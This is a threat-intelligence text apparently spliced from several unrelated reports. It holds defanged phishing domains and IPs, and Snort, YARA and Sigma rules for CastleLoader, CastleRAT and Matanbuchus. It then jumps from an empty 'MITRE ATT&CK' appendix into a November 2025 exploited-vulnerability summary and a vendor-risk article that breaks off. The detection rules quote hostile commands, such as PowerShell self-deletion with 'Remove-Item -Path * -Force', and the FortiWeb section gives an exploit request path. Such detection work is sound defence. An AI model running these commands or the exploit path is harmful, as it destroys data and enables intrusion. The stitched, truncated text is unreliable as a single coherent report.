nicewk[.]com
nimbusvaults[.]com

Cluster 2 (TAG-161) Booking.com-Themed Domains:
checkinastayverify[.]com
checkinistayverify[.]com
checkinstayverify[.]com
checkistayverify[.]com
checksstayverify[.]com
checkystayverify[.]com
confirmahotelastay[.]com
confirmahotelstay[.]com
confirmhotelestay[.]com
confirmhotelistay[.]com
confirmhotelystay[.]com
confirmstayon[.]com
confirmstayonline[.]com
confirmyhotelstay[.]com
guestaformahub[.]com
guestaformhub[.]com
guestaformsafe[.]com
guestaportalverify[.]com
guestaverifyportal[.]com
guestformahub[.]com
guestformasafe[.]com
guestformhub[.]com
guestformsafe[.]com
guestistayhotel[.]com
guestportalverify[.]com
gueststayhotel[.]com
guestverifyhub[.]com
guestverifylink[.]com
guestverifyportal[.]com
guestystayhotel[.]com
guesutastayhotel[.]com
guesytastayhotel[.]com
hoteliguestverify[.]com
hotelistayverify[.]com
hotelyguestverify[.]com
hotelystayverify[.]com
nedpihotel[.]com
pilolhotel[.]com
roomiverifaccess[.]com
roomverifaccess[.]com
roomverifiaccess[.]com
servicehotelonline[.]com
verifihubguest[.]com
verifyhubguest[.]com

Cluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:
77[.]83[.]207[.]55
185[.]39[.]19[.]180
185[.]39[.]19[.]181

Other Domains Linked to Cluster 2 (TAG-161):
cik-ed[.]com
cut-gv[.]com
dip-bo[.]com
dok-ol[.]com
dut-cd[.]com
eta-cd[.]com
eto-sa[.]com
fir-vp[.]com
for-es[.]com
gir-vc[.]com
gut-bk[.]com
her-op[.]com
ipk-sa[.]com
itp-ce[.]com
kil-it[.]com
kip-er[.]com
mac-ig[.]com
map-nv[.]com
ned-uj[.]com
otr-gl[.]com
pit-kp[.]com
rol-vd[.]com
site-bila[.]com
site-here[.]com
site-reto[.]com
site-tilo[.]com
site-wila[.]com
spu-cr[.]com
tam-cg[.]com
uke-sd[.]com
uki-fa[.]com
wal-ik[.]com
xut-uv[.]com
xyt-ko[.]com
ykl-vh[.]com
yt-ko[.]com
zit-fl[.]com

Proxy IP Addresses Linked to Cluster 2 (TAG-161):
109[.]104[.]153[.]29
109[.]104[.]153[.]100
109[.]104[.]153[.]193
109[.]104[.]154[.]67

Additional IP Addresses Linked to Phishing Email Management Tooling:
80[.]64[.]18[.]245
85[.]208[.]84[.]65
88[.]214[.]50[.]83
185[.]39[.]19[.]94

Cluster 3 Booking.com-Themed Domains:
bioskbd[.]com
blkiesf[.]com
boikfrs[.]com
boiksal[.]com
bookingnewprice109034[.]icu
bookingnewprice204167[.]icu
guest-request16433[.]com
guest-request44565494[.]com
guest-request64533[.]com
guest-request666543[.]com
guest-request677653[.]com
guest-update666532345[.]com
hotelroomprice1039375[.]icu
info-guest44567645[.]com
info676345677[.]com
justnewdmain[.]com
newmessage10294[.]com
programsbookss[.]com
request-info3444[.]com
request-info4433345[.]com
request345553[.]com
request44456776[.]com
update-gues3429[.]com
update-guest4398317809[.]com
update-info14546[.]com
update-info3458421[.]com
update-info4467[.]com
update-info4468765[.]com
update-info539156[.]com
update-info71556[.]com
update-reques898665[.]com

Cluster 3 IP Addresses Hosting Booking.com-Themed Domains:
178[.]17[.]57[.]103
192[.]109[.]138[.]102

Appendix I: Snort Rules for CastleLoader

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Checkin"; flow:established,to_server; content:"GET"; http_method; urilen:82,norm; content:"|2F|service|2F|settings|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460302; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460303; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Stager Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; depth:18; fast_pattern; content:".bin"; http_uri; content:"GoogeBot"; http_user_agent; depth:8; isdataat:0,relative; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460304; rev:1; metadata:author MGUT, created_at 2025-08-12, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert tcp $EXTERNAL_NET 79 -> $HOME_NET any (msg:"CastleLoader Malware Inbound Command Retrieval via Finger Service"; flow:established,to_client; content:"Login|3A 20|"; depth:7; content:"Plan|3A|"; distance:0; content:"%random%"; fast_pattern; distance:0; content:"|20|--tlsv1.2|20|-L|20|-o|20|"; distance:0; content:"|0D 0A|mkdir|20|"; distance:0; content:"|0D 0A|tar|20|"; distance:0; reference:url,https://tria.ge/251110-zcgvkstpck; classtype:trojan-activity; sid:52460334; rev:2; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix J: Snort Rules for CastleRAT

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|02 56 77 8E A5 83 D7 05 02 C2 1E D9 70 5A 47 E5 11 92 B5 5A|"; fast_pattern; depth:20; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460307; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|BF CF 04 82 45 DF 4F 09 55 5E 0B 15 9F E2 91 A0 68 51 1E 87|"; fast_pattern; depth:20; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460308; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|6B 13 5C 08 BD 49 59 75 79 62 4E EA 2F DE 57 F4 6E 08 8B 6B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250219-nsbsqazpep; classtype:trojan-activity; sid:52460309; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|56 EA 59 DB 6B DD 36 81 42 01 C6 84 DF 5A 6B E8 38 14 8D 07|"; fast_pattern; depth:20; reference:url,https://tria.ge/250505-wmbvjabk3t; classtype:trojan-activity; sid:52460310; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|A8 CF 1E 1D BA 27 49 FB 63 38 F4 52 A7 9C 39 CF 4A 85 E5 5B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460311; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|0F 0D F7 66 4C B2 D5 12 BA 55 CC BB 2E 1B F4 AD C0 E0 7C A2|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-rt355svtfs; classtype:trojan-activity; sid:52460312; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|74 6F D9 7F B5 48 F6 91 26 E0 16 5A 81 29 4F 35 21 6C 61 82|"; fast_pattern; depth:20; reference:url,https://tria.ge/250813-a7c3fadl7z; classtype:trojan-activity; sid:52460313; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|61 57 7C E8 EE BE 56 71 B3 98 F4 A6 87 E3 0C 39 50 0C 29 41|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460314; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|4D 58 29 58 84 15 1B 1D 2A D9 80 90 5C 36 1C A0 43 05 80 48|"; fast_pattern; depth:20; reference:url,https://tria.ge/250701-v6911aykv9; classtype:trojan-activity; sid:52460335; rev:1; metadata:author MGUT, created_at 2025-10-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:19,norm; content:"|2F|line|2F 3F|fields|3D|16385"; http_uri; depth:19; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460315; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147457"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460316; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147505"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460317; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server; content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147489"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_header; depth:48; reference:url,https://tria.ge/251028-27bcds1nbk; classtype:trojan-activity; sid:52460333; rev:1; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix K: Snort Rules for Matanbuchus

alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"Matanbuchus Loader Inbound DNS Tunneled Data ACK"; content:"|AA AA 85 80 00 01 00 01 00 00 00 00 01 30 14|"; fast_pattern; depth:15; content:"|10|"; distance:20; within:1; content:"|00 10 00 01 00 00 00 3C 00 03 02|ok"; distance:0; isdataat:!1,relative; reference:url,https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up; reference:url,https://tria.ge/250716-b5sksa1wgt; sid:52460327; rev:1; metadata:author MGUT, created_at 2025-09-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Matanbuchus Loader Malware Outbound C2 Communication"; flow:established,to_server; content:"POST|20|"; depth:5; content:"|2E|php"; distance:0; content:"1|0D 0A|User-Agent|3A 20|"; distance:0; content:"Host|3A 20|"; distance:0; content:"Content-Length|3A 20|"; distance:0; content:"Content-Type|3A 20|application|2F|x-www-form-urlencoded|0D 0A|Accept-Language|3A 20|"; distance:0; content:"|0D 0A 0D 0A|"; content:!"|26|"; distance:0; content:"|3D|ey"; fast_pattern; distance:0; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost[^\x0d]+\x0d\x0aContent\x2dLength[^\x0d]+\x0d\x0aContent\x2dType[^\x0d]+\x0d\x0aAccept\x2dLanguage[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://tria.ge/240328-t4ge8sbf65; classtype:bad-unknown; sid:52460167; rev:1; metadata:author MGUT, created_at 2024-03-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix L: Yara Rule for CastleLoader

rule MAL_CastleLoader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-06"
        description = "Detection of the CastleLoader malware executable"
        version = "1.0"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        hash = "1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156"
        hash = "202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04"
        hash = "25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04"
        hash = "b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2"
        hash = "fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c"
        hash = "6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783"
        malware = "CastleLoader"
        malware_id = "8RF9P9"
        category = "MALWARE"
    strings:
        $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }
        $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }
        $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }
        $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW
        $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError
        $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap
        $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess
    condition:
        uint16(0) == 0x5A4D and all of them
}

Appendix M: Yara Rules for CastleRAT

rule MAL_CastleRAT_Python {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the python variant of CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a"
        hash = "53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $cmd1 = "S_CONNECT" fullword
        $cmd2 = "S_COMMAND" fullword
        $cmd3 = "S_PING" fullword
        $cmd4 = "S_CMD" fullword
        $cmd5 = "S_DELETE" fullword
        $cmd6 = "S_POWERSHELL" fullword
        $cmd7 = "S_START_TERMINAL" fullword
        $cmd8 = "S_SESSION_MESSAGE" fullword
        $cmd9 = "S_UPLOAD" fullword
        $fun1 = "CheckElevation():" fullword
        $fun2 = "GetHWID("
        $fun3 = "GetOS("
        $fun4 = "GetIpGeo("
        $fun5 = "rc4createkeyA("
        $fun6 = "EncryptDecryptBufA("
        $fun7 = "RecvTimeout("
        $fun8 = "Send("
        $fun9 = "Connect("
        $fun10 = "ThreadPing("
        $fun11 = "ThreadRecvTerminal("
        $fun12 = "ThreadTerminalSession("
        $fun13 = "ThreadUploadFile("
        $fun14 = "SelfDelete()" fullword
    condition:
        filesize < 50KB and
        7 of ($cmd*) and
        10 of ($fun*)
}

rule MAL_CastleRAT_C {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the C variant of CastleRAT malware"
        version = "2.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75"
        hash = "e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928"
        hash = "67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b"
        hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
        hash = "60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0"
        hash = "cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $log_tag1 = "clipboardlog.txt" fullword wide
        $log_tag2 = "keylog.txt" fullword wide
        $wnd_class1 = "IsabellaWine" fullword wide
        $wnd_class2 = "camera!" fullword wide
        $log_fmt1 = "[%02d:%02d %02d.%02d.%02d] %ws" fullword wide
        $log_fmt2 = "[%02d:%02d %02d.%02d.%02d] " fullword wide
        $log_fmt3 = "[%02d.%02d.%02d %02d:%02d] " fullword wide
        $s1 = "(VPN)" wide ascii
        $s2 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61"  wide
        $s3 = "\"%ws\" -no-deelevate" fullword wide
        $s4 = "IsWindowVisible" fullword ascii
        $s5  = "UAC_InputIndicatorOverlayWnd" fullword wide
        $s6 = "www.ip-api.com" fullword wide
        $s7 = "MachineGuid" fullword wide
        $s8 = "line/?fields=" wide
        $s9 = "C:\\Windows\\System32\\cmd.exe" wide
        $s10  = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" fullword wide

     condition:
       uint16(0) == 0x5a4d and
       any of ($log_tag*) and
       any of ($wnd_class*) and
       any of ($log_fmt*) and
       all of ($s*)
}

rule MAL_CastleRAT_Shellcode_Loader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-10-20"
        description = "Detection of a python based shellcode loader that runs CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        hash = "058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7"
        hash = "190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836"
        malware = "CastleRAT"
        actor = "TAG-150"
        actor_id = "9nk6DO"
        category = "MALWARE"
        malware_id = "9WCga-"
    strings:
        $s1 = "SHELL64_OFFSET = "
        $s2 = "SHELL32_OFFSET = "
        $s3 = "SHELLFUNC = WINFUNCTYPE"
        $s4 = "LoadPE_Shell"
        $s5 = "crt = WinDLL(\"msvcrt.dll\");"
        $s6 = "OPEN_EXISTING" fullword
        $s7 = ".VirtualProtect("
        $s8 = "offset"
        $s9 = "from ctypes"
    condition:
        filesize < 50KB and $s9 at 0 and all of them
}

Appendix N: CastleRAT Sigma Rules

title: CastleRAT C Variant Malware Log File Creation
id: 4d785ac8-17fe-4765-b427-9a31073ad1a7
status: stable
description: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stealer.
references:
  - https://tria.ge/250701-v6911aykv9
  - https://tria.ge/251101-r8f9xstjap
author: Insikt Group, Recorded Future
date: 2025-08-29
level: high
tags:
  - attack.t1608 # Stage Capabilities
  - attack.t1074.001 # Local Data Staging
  - attack.t1115 # Clipboard Data
  - attack.t1056.001 # Keylogging
logsource:
  product: windows
  category: file_event
detection:
  castlerat_logs:
    TargetFilename|endswith:
      - '\AppData\Local\Temp\MuuuuuhGer3'
      - '\AppData\Local\Temp\PluhhSuk3'
      - '\AppData\Local\Temp\AsdDsaHaha3'
      - '\AppData\Local\Temp\ChuChuka'
      - '\AppData\Local\Temp\GagikMaraguiSS'
      - '\AppData\Local\Temp\LowUshrSudujes'
      - '\AppData\Local\Temp\RarnuiKarta'
      - '\AppData\Local\Temp\GrazGraznii'
      - '\AppData\Local\Temp\GiveGvein3'
      - '\AppData\Local\Temp\BeruiowdgsouiHTR'
      - '\AppData\Local\Temp\GDSongdsgndohSDU'
      - '\AppData\Local\JohniiDepp'
      - '\AppData\Local\LuchiiSvet'
      - '\AppData\Local\HmmMaybe'
  condition: castlerat_logs
falsepositives:
  - Unlikely

title: CastleRAT Python Malware Self Deletion
id: 1050a0c4-1110-4b55-938c-0d27259ddd1e
status: stable
description: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/250822-r3a6qaak2t
author: Insikt Group, Recorded Future
date: 2025-08-28
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

title: CastleRAT C Malware Self Deletion
id: 79268bc8-3220-447d-bc7a-02199bed58e9
status: stable
description: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/251101-lh19hstqft/behavioral2
author: Insikt Group, Recorded Future
date: 2025-11-06
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

Appendix O: MITRE ATT&CK Techniques

What security teams need to know:

• Fortinet leads concerns: Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation
• LANDFALL spyware campaign: Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks
• Public exploits proliferate: Seven of ten vulnerabilities have public proof-of-concept code available
• OS Command Injection and Out-of-bounds Write were tied as the most common weakness types

Bottom line: The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.

Quick Reference: November 2025 Vulnerability Table

All 10 vulnerabilities below were actively exploited in November 2025.

Table 1: List of vulnerabilities that were actively exploited in November based on Recorded Future data (Source: Recorded Future)

Key Trends: November 2025

Vendors Most Affected

• Fortinet dominated with two critical FortiWeb vulnerabilities, both enabling remote exploitation
• Microsoft faced a kernel-level race condition affecting all modern Windows versions
• Samsung saw the weaponization of an image processing vulnerability for sophisticated mobile attacks
• Additional affected vendors: Gladinet, Google, Oracle, WatchGuard, CentOS, and Autonomy (OpenPLC)

Most Common Weakness Types

• CWE-78 – OS Command Injection (tied for first)
• CWE-787 – Out-of-bounds Write (tied for first)
• CWE-284 – Improper Access Control
• CWE-362 – Race Condition
• CWE-306 – Missing Authentication for Critical Function

Threat Actor Activity

LANDFALL Android spyware campaign marked November's most sophisticated operation:

• Exploited CVE-2025-21042 for zero-click remote code execution on Samsung devices
• Targeted Middle Eastern countries (Iraq, Iran, Turkey, Morocco) with commercial-grade spyware
• Deployed via weaponized DNG image files through WhatsApp
• Achieved persistent device compromise without user interaction
• Demonstrated advanced anti-analysis and SELinux bypass capabilities

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2025-64446 | Fortinet FortiWeb

Risk Score: 99 (Very Critical) | CISA KEV: Added November 14, 2025

Why this matters: Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.

Affected versions: FortiWeb 8.0.0-8.0.1, 7.6.0-7.6.4, 7.4.0-7.4.9, 7.2.0-7.2.11, 7.0.0-7.0.11

Immediate actions:

• Apply Fortinet's security updates (8.0.2, 7.6.5, 7.4.10, 7.2.12, or 7.0.12)
• Monitor for POST requests to /api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi
• Check for unauthorized admin accounts created since October 2025
• Review logs for Base64-encoded CGIINFO headers
• Disable HTTP/HTTPS on internet-facing interfaces if patching is delayed

Exposure: ~4,768 FortiWeb instances visible on Shodan (Netherlands, US, Germany, Italy, Peru)

Figure 1: Vulnerability Intelligence Card® for CVE-2025-64446 in Recorded Future (Source: Recorded Future)

• Static vendor checks fall short: Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.
• Five common risk scenarios: Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.
• Intelligence-driven defense: Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.
• From trust to verification: The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.

Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights

For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.

Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.

This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.

This article will highlight and analyze 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time third-party risk management and threat intelligence is the only effective prevention.

5 Third-Party Risk Examples and How to Prevent Them

Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:

Type 1: The Software Supply Chain Attack

The Scenario: One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.

Real-World Example: The SolarWinds Orion breach is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who all gladly installed it, thereby granting the attackers insider access to their systems.

Why Traditional Methods Fail: A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.

The Intelligence-Led Solution: Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.

Type 2: The Widespread Third-Party Vulnerability

